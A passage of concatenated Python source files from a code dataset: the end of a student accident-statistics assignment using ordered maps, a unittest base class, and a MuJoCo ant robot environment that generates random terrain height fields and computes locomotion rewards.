om.keys(catalog[initial_year],initial_date,keymax)\n\n keymin = om.minKey(catalog[final_year])\n dates_final_year = om.keys(catalog[final_year],final_date,keymin)\n return 1 , dates_initial_year , dates_final_year\n\n return None\n\ndef Impresoradatosreq4(catalog,initial_date,final_date,accidents_in_range,criteria):\n \"\"\"\n Reto3 - Req4\n \"\"\"\n dictionary = {}\n i = 1\n \n if accidents_in_range[0] == 0 and accidents_in_range[1] != 
None: \n        condition = 2\n    elif accidents_in_range[0] == 1 and accidents_in_range[1] != None: \n        condition = 3\n    \n    while i < condition:\n        more_accidents = 0\n        num_accidents_in_range = 0\n\n        iterator = it.newIterator(accidents_in_range[1])\n        while it.hasNext(iterator):\n\n            Key_Entry = it.next(iterator) \n            day = om.get(catalog[str(Key_Entry.year)],Key_Entry)\n            day_accidents = day[\"value\"][\"Accidents_lst\"]\n\n            iterator_accidents = it.newIterator(day_accidents)\n            while it.hasNext(iterator_accidents):\n                \n                accidents = it.next(iterator_accidents)\n                criteria_dictkey = accidents[criteria]\n                if criteria_dictkey not in dictionary:\n                    dictionary[criteria_dictkey] = 1\n                else:\n                    dictionary[criteria_dictkey] = dictionary[criteria_dictkey] + 1\n\n            num_accidents_in_day = lt.size(day_accidents) \n            num_accidents_in_range = num_accidents_in_range + num_accidents_in_day \n            \n            if num_accidents_in_day > more_accidents: \n                more_accidents = num_accidents_in_day\n                more_accidents_day = day\n        i = i + 1\n\n    max_dict_value = 0\n    dictionary_keys = dictionary.keys()\n\n    for value in dictionary_keys: \n        num_value = dictionary[value]\n        if num_value > max_dict_value:\n            max_dict_value = num_value\n            max_value = value\n\n    return max_value , dictionary[max_value] , more_accidents_day , num_accidents_in_range\n\ndef getState(catalog,initial_date,final_date):\n    \"\"\"\n    Reto3 - Req4\n    Retorna el estado con más accidentes\n    \"\"\" \n    criteria = \"State\"\n    accidents_in_range = auxiliardelaauxiliar(catalog,initial_date,final_date)\n    if accidents_in_range is not None:\n        accidents_in_range_by_criteria = Impresoradatosreq4(catalog,initial_date,final_date,accidents_in_range,criteria)\n        return accidents_in_range_by_criteria\n    return None\n\ndef yearsSize(catalog):\n    \"\"\"\n    Reto3 - Req1 \n    Número de fechas en las que ocurrieron accidentes de todos los años.\n    \"\"\" \n    Año1=om.size(catalog[\"2016\"])\n    Año2=om.size(catalog[\"2017\"])\n    Año3=om.size(catalog[\"2018\"])\n    Año4=om.size(catalog[\"2019\"])\n    Año5=om.size(catalog[\"2020\"])\n    return Año1 + Año2 + Año3 + Año4, Año5\n\ndef YearSize_1(catalog):\n    \"\"\"\n    Reto3 - Req1 \n    Número de fechas en las que ocurrieron accidentes de\n    cada año.\n    \"\"\" \n    Año1=om.size(catalog[\"2016\"])\n    Año2=om.size(catalog[\"2017\"])\n    Año3=om.size(catalog[\"2018\"])\n    Año4=om.size(catalog[\"2019\"])\n    Año5=om.size(catalog[\"2020\"])\n    return Año1 , Año2 , Año3 , Año4, Año5\n\ndef accidentsSize(catalog):\n    \"\"\"\n    Reto3 - Req1 \n    Número de accidentes.\n    \"\"\" \n    return lt.size(catalog[\"accidents\"])\n\ndef YearHeight_1(catalog):\n    \"\"\"\n    Reto3 - Req1 \n    Altura del árbol de cada año.\n    \"\"\" \n    Año1=om.height(catalog[\"2016\"])\n    Año2=om.height(catalog[\"2017\"])\n    Año3=om.height(catalog[\"2018\"])\n    Año4=om.height(catalog[\"2019\"])\n    Año5=om.height(catalog[\"2020\"])\n\n    return Año1, Año2, Año3, Año4, Año5\n\ndef statesSize(catalog):\n    \"\"\"\n    Reto3 - Req4\n    Número de estados cargados.\n    \"\"\"\n    return m.size(catalog[\"States\"])\n\n# ==============================\n# Funciones de Comparacion\n# ==============================\n\ndef CompareSeverity_prueba(severity_accident1,severity_accident2):\n    \"\"\"\n    Compara la gravedad de accidentes. 
\n \"\"\"\n severity_accident2 = me.getKey(severity_accident2)\n if (severity_accident1 == severity_accident2):\n return 0\n elif (severity_accident1 > severity_accident2):\n return 1\n else:\n return -1\n\ndef CompareDates_Final(date1,date2):\n \"\"\"\n Compara dos fechas de accidentes en años específicos.\n \"\"\"\n if (date1 == date2):\n return 0\n elif (date1 > date2):\n return 1\n else:\n return -1\n\ndef compareAccidentsId(id1,id2):\n \"\"\"\n Compara dos Ids de accidentes. \n \"\"\"\n if (id1 == id2):\n return 0\n elif (id1 > id2):\n return 1\n else:\n return -1\n\n","sub_path":"App/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"504559825","text":"import unittest\nfrom .test_data import HistoryTestData\n\nclass TestBase(unittest.TestCase):\n \"\"\"Base class for testing\"\"\"\n \n @classmethod\n def setUpClass(cls):\n cls.data_reader = HistoryTestData()\n cls.history = cls.data_reader.get()\n cls.history_other = cls.data_reader.get_compare()\n cls.history_bad = cls.data_reader.get_bad()\n\n cls.converge_quantities = (5, 20, 30, 50, 75, 100, 120, 150, 200, 250, 350, 500, 600, 700, 800, 900, 1000)\n\n @classmethod\n def tearDownClass(cls):\n cls.data_reader = None\n cls.history = None\n cls.history_other = None\n cls.history_bad = None\n","sub_path":"wraps/python/tests/TestBase.py","file_name":"TestBase.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"77416412","text":"import numpy as np\nimport mujoco_py\n# from nexabots.src import my_utils as my_utils\nimport os\nimport cv2\nfrom gym.utils import seeding\nfrom collections import namedtuple\nfrom scipy import ndimage\nfrom math import acos\nfrom opensimplex import OpenSimplex\nimport math\nimport time\n\nEnv_config = namedtuple('Env_config', [\n 'name',\n 'ground_roughness',\n 'pit_gap',\n 'stump_width', 'stump_height', 'stump_float',\n 'stair_height', 'stair_width', 'stair_steps'\n])\n\n_HEIGHTFIELD_ID = 0\n_TERRAIN_SMOOTHNESS = 0.15 # 0.0: maximally bumpy; 1.0: completely smooth.\n_TERRAIN_BUMP_SCALE = 2 # Spatial scale of terrain bumps (in meters).\n_DEFAULT_VALUE_AT_MARGIN = 0.1\n\nSCALE = 30.0 # affects how fast-paced the game is, forces should be adjusted as well\n\nVIEWPORT_W = 600\nVIEWPORT_H = 400\n\nTERRAIN_STEP = 14 / SCALE\nTERRAIN_LENGTH = 100000 # in steps\nTERRAIN_HEIGHT = VIEWPORT_H / SCALE / 4\n# TERRAIN_HEIGHT = 1.0\nTERRAIN_GRASS = 10 # low long are grass spots, in steps\nTERRAIN_STARTPAD = 100 # in steps\n\nclass AntTerrain:\n def __init__(self, animate=False, sim=None, camera=False, heightfield=True):\n if camera:\n import cv2\n self.prev_img = np.zeros((24,24))\n\n if sim is not None:\n self.sim = sim\n self.model = self.sim.model\n else:\n self.modelpath = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"assets/ant_blind.xml\")\n self.model = mujoco_py.load_model_from_path(self.modelpath)\n self.sim = mujoco_py.MjSim(self.model)\n\n self.env_config = None\n self.env_params = None\n self.env_seed = None\n self._seed()\n\n self._healthy_z_range = (0.2, 1.0)\n self._z_reward_weight = 0.05\n self._healthy_reward = 1.0 * self._z_reward_weight\n self._terminate_when_unhealthy = False\n self._contact_force_range = (-1.0, 1.0)\n self._ctrl_cost_weight = 0.3 #0.5\n self._contact_cost_weight = 5e-4\n self.forward_weight = 70\n self.sum_reward = 0.0\n self.reward_threshold = 
3000.0\n\n # External parameters\n self.joints_rads_low = np.array([-0.2, -0.6, -0.6] * 4)\n self.joints_rads_high = np.array([0.6, 0.6, 0.6] * 4)\n self.joints_rads_diff = self.joints_rads_high - self.joints_rads_low\n self.target_vel = 0.5 # Target velocity with which we want agent to move\n self.max_steps = 3000\n self.over = 0\n\n self.camera = camera\n self.animate = animate\n self.HF = heightfield\n\n # if self.HF:\n # self.hf_data = self.model.hfield_data\n # self.hf_ncol = self.model.hfield_ncol[0]\n # self.hf_nrow = self.model.hfield_nrow[0]\n # self.hf_size = self.model.hfield_size[0]\n # self.hf_grid = self.hf_data.reshape((self.hf_nrow, self.hf_ncol))\n # self.hf_grid_aug = np.zeros((self.hf_nrow * 2, self.hf_ncol * 2))\n # self.hf_grid_aug[:self.hf_nrow, :self.hf_ncol] = self.hf_grid\n # self.hf_m_per_cell = float(self.hf_size[1]) / self.hf_nrow\n # self.rob_dim = 0.5\n # self.hf_res = int(self.rob_dim / self.hf_m_per_cell)\n # self.hf_offset_x = 4\n # self.hf_offset_y = 3\n # self._healthy_z_range = (0.2, 0.5+np.max(self.model.hfield_data))\n\n self.model.opt.timestep = 0.02\n\n # Environment dimensions\n self.q_dim = self.sim.get_state().qpos.shape[0]\n self.qvel_dim = self.sim.get_state().qvel.shape[0]\n\n self.obs_dim = self.q_dim + self.qvel_dim - 2 + 4 + (24**2) * 2 # x,y not present, + 4contacts\n self.act_dim = self.sim.data.actuator_length.shape[0]\n\n # Environent inner parameters\n self.viewer = None\n self.step_ctr = 0\n\n if camera:\n self.cam_viewer = mujoco_py.MjRenderContextOffscreen(self.sim, 0)\n\n self.frame_list = []\n\n # Initial methods\n if animate:\n self.setupcam()\n\n self.reset()\n\n def seed(self, seed=None):\n return self._seed(seed)\n\n def _seed(self, seed=None):\n self.env_seed = seed\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def set_env_config(self, env_config):\n self.config = env_config\n\n def augment(self, params):\n self.env_params = params\n\n def state_vector(self):\n return np.concatenate([\n self.sim.data.qpos.flat,\n self.sim.data.qvel.flat\n ])\n\n @property\n def is_healthy(self):\n state = self.state_vector()\n min_z, max_z = self._healthy_z_range\n is_healthy = (np.isfinite(state).all() and min_z <= state[2] <= max_z)\n return is_healthy\n\n @property\n def healthy_reward(self):\n return float(\n self.is_healthy\n or self._terminate_when_unhealthy\n ) * self._healthy_reward\n\n def control_cost(self, action):\n control_cost = self._ctrl_cost_weight * np.sum(np.square(action))\n return control_cost\n\n @property\n def contact_forces(self):\n raw_contact_forces = self.sim.data.cfrc_ext\n min_value, max_value = self._contact_force_range\n contact_forces = np.clip(raw_contact_forces, min_value, max_value)\n return contact_forces\n\n @property\n def contact_cost(self):\n contact_cost = self._contact_cost_weight * np.sum(\n np.square(self.contact_forces))\n return contact_cost\n\n\n def setupcam(self):\n if self.viewer is None:\n self.viewer = mujoco_py.MjViewer(self.sim)\n self.viewer.cam.trackbodyid = -1\n self.viewer.cam.distance = self.model.stat.extent * 1.3\n self.viewer.cam.lookat[0] = -0.1\n self.viewer.cam.lookat[1] = 0\n self.viewer.cam.lookat[2] = 0.5\n self.viewer.cam.elevation = -20\n\n def get_no_cont_penlty(self):\n c_forces = []\n # print(self.model.geom_names)\n penetration = 0\n touch = 0\n no_touch_penlty = 0.0\n penetration_penlty = 0.0\n body_penlty = 0.0\n # print(self.model.geom_contype)\n for i in range(self.sim.data.ncon):\n contact = self.sim.data.contact[i]\n if 
((self.model.geom_id2name(contact.geom1) == 'left_ankle_geom'\n or self.model.geom_id2name(contact.geom1) == 'right_ankle_geom'\n or self.model.geom_id2name(contact.geom1) == 'third_ankle_geom'\n or self.model.geom_id2name(contact.geom1) == 'fourth_ankle_geom') and self.model.geom_id2name(contact.geom2) == 'floor') or \\\n ((self.model.geom_id2name(contact.geom2) == 'left_ankle_geom'\n or self.model.geom_id2name(contact.geom2) == 'right_ankle_geom'\n or self.model.geom_id2name(contact.geom2) == 'third_ankle_geom'\n or self.model.geom_id2name(contact.geom2) == 'fourth_ankle_geom') and self.model.geom_id2name(contact.geom1) == 'floor'):\n\n if contact.dist < 0:\n penetration += 1\n else:\n touch += 1\n if (self.model.geom_id2name(contact.geom1) == 'floor' and self.model.geom_id2name(contact.geom2) == 'torso_geom') or \\\n (self.model.geom_id2name(contact.geom2) == 'floor' and self.model.geom_id2name(\n contact.geom1) == 'torso_geom'):\n body_penlty = 1.0\n # c_array = np.zeros(6, dtype=np.float64)\n # mujoco_py.functions.mj_contactForce(self.model, self.sim.data, i, c_array)\n # # Convert the contact force from contact frame to world frame\n # ref = np.reshape(contact.frame, (3, 3))\n # c_force = np.dot(np.linalg.inv(ref), c_array[0:3])\n # # print('contact force in world frame:', c_force)\n # c_forces.append(c_force)\n if touch == 0:\n no_touch_penlty = 1.0\n elif penetration > 0:\n penetration_penlty = 1.0 * penetration\n return no_touch_penlty + penetration_penlty + body_penlty\n\n def get_obs(self):\n qpos = self.sim.get_state().qpos.tolist()\n qvel = self.sim.get_state().qvel.tolist()\n a = qpos + qvel\n return np.asarray(a, dtype=np.float32)\n\n def get_obs_dict(self):\n od = {}\n\n od['rangefinder'] = self.rangefinder()\n od['contact_sensors'] = self.contact_sensor()\n\n # Intrinsic parameters\n for j in self.sim.model.joint_names:\n od[j + \"_pos\"] = self.sim.data.get_joint_qpos(j)\n od[j + \"_vel\"] = self.sim.data.get_joint_qvel(j)\n\n # Height field\n if self.HF:\n od[\"hf\"] = self.get_local_hf(*od[\"root_pos\"][0:2])\n\n if self.camera:\n # On board camera input\n cam_array = self.sim.render(camera_name=\"frontal\", width=24, height=24)\n img = cv2.cvtColor(np.flipud(cam_array), cv2.COLOR_BGR2GRAY)\n od['cam'] = img\n\n # Contacts:\n od['contacts'] = np.clip(np.square(np.array(self.sim.data.cfrc_ext[[4, 7]])).sum(axis=1), 0, 1)\n\n return od\n\n def get_the_hf(self, x, y):\n x_coord = int((x + self.hf_offset_x) * 5)\n y_coord = int((y + self.hf_offset_y) * 5)\n # print('x_coord', x_coord)\n return self.hf_grid_aug[y_coord-1:y_coord+1, x_coord-1:x_coord+1]\n\n def get_local_hf(self, x, y):\n x_coord = int((x + self.hf_offset_x) * 5)\n y_coord = int((y + self.hf_offset_y) * 5)\n return self.hf_grid_aug[y_coord - self.hf_res: y_coord + self.hf_res,\n x_coord - self.hf_res: x_coord + self.hf_res]\n\n def get_state(self):\n return self.sim.get_state()\n\n def set_state(self, qpos, qvel=None):\n qvel = np.zeros(self.qvel_dim) if qvel is None else qvel\n old_state = self.sim.get_state()\n new_state = mujoco_py.MjSimState(old_state.time, qpos, qvel,\n old_state.act, old_state.udd_state)\n self.sim.set_state(new_state)\n self.sim.forward()\n\n def render(self, human=True):\n if self.viewer is None:\n self.viewer = mujoco_py.MjViewer(self.sim)\n if not human:\n return self.sim.render(camera_name=None,\n width=224,\n height=224,\n depth=False)\n self.viewer.render()\n\n def get_body_com(self, body_name):\n return self.sim.data.get_body_xpos(body_name)\n\n def get_sensor(self):\n return 
self.sim.data.sensordata\n\n def rangefinder(self):\n rf_readings = self.get_sensor()[4:]\n no_intersection = -1.0\n return np.where(rf_readings == no_intersection, 1.0, np.tanh(rf_readings))\n def contact_sensor(self):\n contacts = self.get_sensor()[:4]\n min_value, max_value = self._contact_force_range\n contacts = np.clip(contacts, min_value, max_value)\n return contacts\n\n def do_simulation(self, action, n_frames=1):\n self.sim.data.ctrl[:] = action\n self.sim.forward()\n for _ in range(n_frames):\n self.sim.step()\n\n def scale_action(self, action):\n return (np.array(action) * 0.5 + 0.5) * self.joints_rads_diff + self.joints_rads_low\n def scale_joints(self, joints):\n return ((np.array(joints) - self.joints_rads_low) / self.joints_rads_diff) * 2 - 1\n def get_agent_obs(self):\n qpos = self.sim.get_state().qpos.tolist()\n qvel = self.sim.get_state().qvel.tolist()\n contacts = np.array(self.sim.data.sensordata[0:4], dtype=np.float32)\n contacts[contacts > 0.05] = 1\n contacts[contacts <= 0.05] = -1\n if self.camera:\n cam_array = self.sim.render(camera_name=\"frontal\", width=64, height=64)\n img = cv2.cvtColor(np.flipud(cam_array), cv2.COLOR_BGR2GRAY)\n return np.concatenate((self.scale_joints(qpos[7:]), qvel[6:], qpos[3:7], qvel[:6], contacts))\n\n @property\n def dt(self):\n return self.model.opt.timestep\n\n def step(self, ctrl):\n obs_p = self.get_agent_obs()\n # print('self.get_body_com(\"torso\"): ', self.model.body_subtreemass)\n xy_position_before = self.get_body_com(\"torso\")[:2].copy()\n ctrl = np.clip(ctrl, -1, 1)\n ctrl_pen = np.square(ctrl).mean()\n ctrl = self.scale_action(ctrl)\n\n # Step the simulator\n self.sim.data.ctrl[:] = ctrl\n self.sim.forward()\n self.sim.step()\n self.step_ctr += 1\n\n xy_position_after = self.get_body_com(\"torso\")[:2].copy()\n xy_velocity = (xy_position_after - xy_position_before) / self.dt\n x_velocity, y_velocity = xy_velocity\n forward_reward = x_velocity\n\n # ctrl_cost = self.control_cost(action)\n # contact_cost = self.contact_cost\n # healthy_reward = self.healthy_reward\n\n bx, by, bz, qw, qx, qy, qz = self.sim.get_state().qpos.tolist()[:7]\n xd, yd, zd, thd, phid, psid = self.sim.get_state().qvel.tolist()[:6]\n\n # print(xd )\n # print('xy_velocity', xy_velocity)\n\n # Reward conditions\n velocity_rew = 1. / (abs(xd - self.target_vel) + 1.) - 1. 
/ (self.target_vel + 1.)\n obs_c = self.get_agent_obs()\n # velocity_rew = obs_c[0] - obs_p[0]\n\n q_yaw = 2 * acos(qw)\n\n r = velocity_rew * 10 - \\\n np.square(q_yaw) * 0.5 - \\\n np.square(ctrl_pen) * 0.01 - \\\n np.square(zd) * 0.5\n # r = r*self.model.hfield_size[0,2]\n # print('velocity ', velocity_rew)\n # print('np.square(q_yaw) ', np.square(q_yaw))\n # print('np.square(ctrl_pen) ', np.square(ctrl_pen))\n # print('np.square(zd) * 0.5 ', np.square(zd) * 0.5)\n # print('obs_c[0] - obs_p[0] ', obs_c[0] - obs_p[0])\n\n self.sum_reward += r\n\n obs_dict = self.get_obs_dict()\n # obs = np.concatenate(\n # (obs_c.astype(np.float32)[2:], obs_dict[\"contacts\"], obs_dict['rangefinder'], obs_dict['contact_sensors']))\n\n if np.sum(obs_p[-4:]) == -4 and np.sum(obs_c[-4:]) == -4:\n self.over += 1\n else:\n self.over = 0\n\n # Reevaluate termination condition\n # done = self.step_ctr > self.max_steps # or abs(roll) > 0.8 or abs(pitch) > 0.8\n done = bz < 0 or self.step_ctr > self.max_steps or self.over > 100\n\n return obs_c, r, done, obs_dict\n #\n # def step(self, action):\n #\n # obs_p = self.get_obs()\n # self.do_simulation(action, n_frames=2)\n # self.step_ctr += 1\n #\n # #print(self.sim.data.ncon) # Prints amount of current contacts\n # obs_c = self.get_obs()\n # x,y,z = obs_c[0:3]\n #\n # cost = self.control_cost(action) + self.contact_cost\n # forward_reward = (obs_c[0] - obs_p[0]) * self.forward_weight\n #\n # obs_dict = self.get_obs_dict()\n # obs = np.concatenate((obs_c.astype(np.float32)[2:], obs_dict[\"contacts\"], obs_dict['rangefinder'], obs_dict['contact_sensors']))\n #\n # rewards = forward_reward - cost + self.healthy_reward\n #\n # if self.camera:\n # obs = np.concatenate((obs, obs_dict[\"cam\"].flatten(), self.prev_img.flatten()))\n # self.prev_img = obs_dict[\"cam\"]\n #\n # # Reevaluate termination condition\n # done = self.step_ctr > 1000 or z < 0.1\n #\n # return obs, rewards, done, obs_dict\n\n def reset(self):\n # if self.sum_reward > self.reward_threshold or self.step_ctr == 0:\n self.distroy_terrains()\n self.gen_terrains()\n # self.perlin()\n\n self.over = 0\n self.step_ctr = 0\n self.sum_reward = 0.0\n init_q = np.zeros(self.q_dim, dtype=np.float32)\n init_q[0] = np.random.randn() * 0.1\n init_q[1] = np.random.randn() * 0.1\n # init_q[2] = 0.80 + np.random.rand() * 0.1\n init_q[2] = min(np.max(self.get_local_hf(init_q[0], init_q[1])) + np.random.randn() * 0.1 + 0.2, self.model.hfield_size[0, 2]/2 + np.random.rand() * 0.1)\n init_qvel = np.random.randn(self.qvel_dim).astype(np.float32) * 0.1\n\n self.set_state(init_q, init_qvel)\n obs, _, _, _ = self.step(np.zeros(self.act_dim))\n\n # obs = np.concatenate((init_q, init_qvel)).astype(np.float32)\n obs_dict = self.get_obs_dict()\n # obs = np.concatenate((obs[2:], obs_dict[\"contacts\"], obs_dict['rangefinder'], obs_dict['contact_sensors']))\n\n if self.camera:\n obs = np.concatenate((obs, obs_dict[\"cam\"].flatten(), self.prev_img.flatten()))\n self.prev_img = obs_dict[\"cam\"]\n\n return obs\n\n def distroy_terrains(self):\n import glfw\n if self.viewer is not None:\n glfw.destroy_window(self.viewer.window)\n self.viewer = None\n res = self.model.hfield_nrow[_HEIGHTFIELD_ID]\n assert res == self.model.hfield_ncol[_HEIGHTFIELD_ID]\n start_idx = self.model.hfield_adr[_HEIGHTFIELD_ID]\n self.model.hfield_data[start_idx:start_idx+res*self.model.hfield_ncol[_HEIGHTFIELD_ID]] = np.zeros((res, res)).ravel()\n\n def gen_terrains(self):\n if self.model.hfield_size[0, 2] <= 2.2:\n self.model.hfield_size[0, 2] += 0.001\n 
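        # Curriculum note: the check above raises the height field's vertical scale by 0.001\n        # on each reset while it is still at or below 2.2, so terrain difficulty ramps up\n        # gradually across episodes. The same clamped-increment idea in isolation, kept in\n        # comments so behaviour is unchanged (ramp is a hypothetical helper, not part of\n        # this class):\n        #     def ramp(value, step=0.001, cap=2.2):\n        #         # one curriculum step, never past the cap\n        #         return min(value + step, cap)\n        #     self.model.hfield_size[0, 2] = ramp(self.model.hfield_size[0, 2])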
level = np.random.uniform(0.5, 1.5, 1)\n res = self.model.hfield_nrow[_HEIGHTFIELD_ID]\n assert res == self.model.hfield_ncol[_HEIGHTFIELD_ID]\n # Sinusoidal bowl shape.\n row_grid, col_grid = np.ogrid[-1:1:res*1j, -1:1:res*1j]\n radius = np.clip(np.sqrt(col_grid**2 + row_grid**2), .04, 1)\n bowl_shape = level - np.cos(2*np.pi*radius)/2\n # Random smooth bumps.\n terrain_size = 2 * self.model.hfield_size[_HEIGHTFIELD_ID, 0]\n bump_res = int(terrain_size / _TERRAIN_BUMP_SCALE)\n bumps = np.random.uniform(_TERRAIN_SMOOTHNESS, 1, (bump_res, bump_res))\n smooth_bumps = ndimage.zoom(bumps, res / float(bump_res))\n terrain_bowl = bowl_shape * smooth_bumps\n if self.env_params is not None:\n # Terrain is elementwise product.\n terrain_bowl = (terrain_bowl - np.min(terrain_bowl)) / (np.max(terrain_bowl) - np.min(terrain_bowl)) * \\\n (self.model.hfield_size[_HEIGHTFIELD_ID, 2] - 0.0) + 0.0\n terrain = terrain_bowl * 0.3 + self._generate_terrain() * 0.7\n else:\n terrain = bowl_shape * smooth_bumps\n # terrain = self._generate_terrain()\n terrain = (terrain - np.min(terrain)) / (np.max(terrain) - np.min(terrain)) * (self.model.hfield_size[_HEIGHTFIELD_ID, 2] - 0.0) + 0.0\n\n # self.difficulty_meassure(terrain)\n\n start_idx = self.model.hfield_adr[_HEIGHTFIELD_ID]\n self.model.hfield_data[start_idx:start_idx+res*self.model.hfield_ncol[_HEIGHTFIELD_ID]] = terrain.ravel()\n # print('variance: ', np.var(terrain.ravel()))\n\n self.hf_data = self.model.hfield_data\n self.hf_ncol = self.model.hfield_ncol[0]\n self.hf_nrow = self.model.hfield_nrow[0]\n self.hf_size = self.model.hfield_size[0]\n self.hf_grid = self.hf_data.reshape((self.hf_nrow, self.hf_ncol))\n self.hf_grid_aug = np.zeros((self.hf_nrow * 2, self.hf_ncol * 2))\n self.hf_grid_aug[:self.hf_nrow, :self.hf_ncol] = self.hf_grid\n self.hf_m_per_cell = float(self.hf_size[1]) / self.hf_nrow\n self.rob_dim = 0.5\n self.hf_res = int(self.rob_dim / self.hf_m_per_cell)\n self.hf_offset_x = 10\n self.hf_offset_y = 20\n self._healthy_z_range = (0.2, 0.5 + np.max(self.model.hfield_data))\n\n def _generate_terrain(self):\n velocity = 0.0\n z_norm = 0.0\n terrain_z = []\n nrows = self.model.hfield_nrow[_HEIGHTFIELD_ID]\n ncols = self.model.hfield_ncol[_HEIGHTFIELD_ID]\n TERRAIN_HEIGHT = self.model.hfield_size[_HEIGHTFIELD_ID, 3]\n z = TERRAIN_HEIGHT\n for y in range(nrows):\n for x in range(ncols):\n nx = x * TERRAIN_STEP\n ny = y * TERRAIN_STEP\n # nx = x / nrows - 0.5\n # ny = y / ncols - 0.5\n velocity = 0.2 * velocity + 0.08 * np.sign(TERRAIN_HEIGHT - z)\n if self.env_params is not None and self.env_params.altitude_fn is not None:\n z += velocity\n if x < TERRAIN_STARTPAD:\n mid = ncols * _TERRAIN_BUMP_SCALE / 2.\n y_ = (ny - mid) * np.pi / mid\n x_ = (nx - mid) * np.pi / mid\n # y_ = ny/(200*TERRAIN_STEP) * 2 - 1\n # x_ = nx/(200*TERRAIN_STEP) * 2 - 1\n z = TERRAIN_HEIGHT + self.env_params.altitude_fn((x_, y_))[0]\n if y == TERRAIN_STARTPAD - 10 and x == TERRAIN_STARTPAD - 10:\n z_norm = self.env_params.altitude_fn((x_, y_))[0] / 2\n z -= z_norm\n\n # print(self.env_params.altitude_fn((x_, y_))[0])\n # # print('dd: ', .5 - np.cos(2 * np.pi * (np.sqrt(x_ ** 2 + y_ ** 2))) / 2)\n\n # z = (1.00 * (self.env_params.altitude_fn((1 * nx, 1 * ny))[0] / 2 + 0.5)\n # + 0.50 * self.env_params.altitude_fn((2 * nx, 2 * ny))[0]\n # + 0.25 * self.env_params.altitude_fn((4 * nx, 4 * ny))[0]\n # + 0.13 * self.env_params.altitude_fn((8 * nx, 8 * ny))[0]\n # + 0.06 * self.env_params.altitude_fn((16 * nx, 16 * ny))[0]\n # + 0.03 * self.env_params.altitude_fn((32 * nx, 32 
* ny))[0])\n # z = z / (1.00 + 0.50 + 0.25 + 0.13 + 0.06 + 0.03)\n # if y == TERRAIN_STARTPAD + 1 or x == TERRAIN_STARTPAD + 1:\n # z_norm = self.env_params.altitude_fn((nx, ny))[0]\n else:\n if x < TERRAIN_STARTPAD:\n velocity += np.random.uniform(-1, 1) / SCALE\n z += _TERRAIN_SMOOTHNESS * velocity\n terrain_z.append(z)\n terrain_z = np.array(terrain_z).reshape(nrows,ncols)\n # terrain = terrain_z\n # print(np.var(terrain))\n terrain = (terrain_z - np.min(terrain_z)) / (np.max(terrain_z) - np.min(terrain_z)) * (self.model.hfield_size[_HEIGHTFIELD_ID,2] - 0.2) + 0.2\n return terrain\n\n def difficulty_meassure(self, terrain):\n data = terrain[99,60:]\n dist = np.abs(np.diff(data))\n with open(\"level.txt\", \"a+\") as file:\n # with open(\"/home/fang/project/thesis/ant_poet/poet/poet_distributed/niches/box2d/ant_terrain_mjc/level.txt\", \"a+\") as file:\n file.seek(0)\n tmp = file.read(100)\n if len(tmp) > 0:\n file.write(\"\\n\")\n file.write(str(np.max(dist)))\n file.close()\n\n def perlin(self):\n oSim = OpenSimplex(seed=int(time.time()))\n\n height = 200\n\n M = self.model.hfield_ncol[0]\n N = self.model.hfield_nrow[0]\n mat = np.zeros((M, N))\n\n scale_x = np.random.randint(30, 100)\n scale_y = np.random.randint(30, 100)\n octaves = 4 # np.random.randint(1, 5)\n persistence = np.random.rand() * 0.3 + 0.3\n lacunarity = np.random.rand() + 1.5\n\n for i in range(M):\n for j in range(N):\n for o in range(octaves):\n sx = scale_x * (1 / (lacunarity ** o))\n sy = scale_y * (1 / (lacunarity ** o))\n amp = persistence ** o\n mat[i][j] += oSim.noise2d(i / sx, j / sy) * amp\n\n wmin, wmax = mat.min(), mat.max()\n mat = (mat - wmin) / (wmax - wmin) * height\n\n if np.random.rand() < 0.3:\n num = np.random.randint(50, 120)\n mat = np.clip(mat, num, 200)\n if np.random.rand() < 0.3:\n num = np.random.randint(120, 200)\n mat = np.clip(mat, 0, num)\n\n # Walls\n mat[0, 0] = 255.\n mat = (mat - np.min(mat))/(np.max(mat) - np.min(mat)) * (self.model.hfield_size[_HEIGHTFIELD_ID,2] - 0.2) + 0.2\n start_idx = self.model.hfield_adr[_HEIGHTFIELD_ID]\n self.model.hfield_data[start_idx:start_idx + M * self.model.hfield_ncol[_HEIGHTFIELD_ID]] = mat.ravel()\n\n self.hf_data = self.model.hfield_data\n self.hf_ncol = self.model.hfield_ncol[0]\n self.hf_nrow = self.model.hfield_nrow[0]\n self.hf_size = self.model.hfield_size[0]\n self.hf_grid = self.hf_data.reshape((self.hf_nrow, self.hf_ncol))\n self.hf_grid_aug = np.zeros((self.hf_nrow * 2, self.hf_ncol * 2))\n self.hf_grid_aug[:self.hf_nrow, :self.hf_ncol] = self.hf_grid\n self.hf_m_per_cell = float(self.hf_size[1]) / self.hf_nrow\n self.rob_dim = 0.5\n self.hf_res = int(self.rob_dim / self.hf_m_per_cell)\n self.hf_offset_x = 10\n self.hf_offset_y = 20\n self._healthy_z_range = (0.2, 0.5 + np.max(self.model.hfield_data))\n\n # return mat, {\"height\": .2}\n\n def demo(self):\n self.reset()\n if self.HF:\n cv2.namedWindow(\"HF\")\n if self.camera:\n cv2.namedWindow(\"cam\")\n cv2.namedWindow(\"con\")\n\n for i in range(1000):\n _, _, _, od = self.step(np.random.randn(self.act_dim))\n\n # LED IDS: 4,7,10,13\n cv2.imshow(\"con\", np.array(self.sim.data.cfrc_ext[[4, 7, 10, 13]]))\n cv2.waitKey(1)\n\n if self.animate:\n self.render()\n\n if self.HF:\n hf = od['hf']\n cv2.imshow(\"HF\", np.flipud(hf))\n cv2.waitKey(1)\n\n if self.camera:\n cv2.imshow(\"cam\", cv2.resize(od['cam'], (24, 24)))\n cv2.waitKey(1)\n\nif __name__ == \"__main__\":\n ant = AntTerrain(animate=True, camera=False)\n 
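    # demo() below drives the environment with random actions; an equivalent manual\n    # gym-style rollout is sketched in these comments so demo()'s behaviour is unchanged\n    # (policy is a hypothetical stand-in for an actual controller):\n    #     obs = ant.reset()\n    #     done = False\n    #     while not done:\n    #         act = np.random.randn(ant.act_dim)  # or policy(obs)\n    #         obs, reward, done, info = ant.step(act)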
